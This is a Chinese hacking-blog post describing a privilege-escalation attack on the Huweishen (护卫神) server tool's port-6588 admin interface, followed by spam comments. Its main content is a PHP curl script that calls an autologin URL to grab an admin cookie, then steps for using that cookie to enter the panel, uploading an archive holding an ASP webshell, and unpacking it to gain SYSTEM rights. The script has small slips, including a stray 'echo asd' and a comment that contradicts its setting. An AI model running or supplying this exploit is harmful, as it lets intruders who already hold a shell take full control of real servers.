护卫神6588端口提权漏洞

利用条件:

shell权限

可执行脚本

<?php
function httpGet() {
    $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header
    curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    return $result;
}
echo httpGet();
echo asd;
?>

上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权

版权声明:若无特殊注明,本文作者:颓废,如若转载,请注明出处。

本文链接:护卫神6588端口提权漏洞 - https://www.0dayhack.com/penetration/121.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论列表(4条)

  • แครี่บอยมือสอง

    I am no longer sure where you’re getting your information,
    but good topic. I must spend some time learning more or figuring out more.
    Thank you for wonderful information I was in search of
    this information for my mission.

  • livingstoneguesthouse.com
    livingstoneguesthouse.com 2020年3月22日 08:59

    Hey! This is my first comment here so I just wanted to give a quick shout out and say I really enjoy reading through your posts.
    Can you suggest any other blogs/websites/forums that go over the same topics?
    Thanks a ton!

  • lenovo n22 deals
    lenovo n22 deals 2020年3月29日 09:05

    Spot on with this write-up, I absolutely believe this amazing
    site needs a lot more attention. I’ll probably be back again to read more, thanks for the advice!

联系我们

在线咨询:点击这里给我发消息
邮件:[email protected]
工作时间:周一至周五,9:30-18:30,节假日休息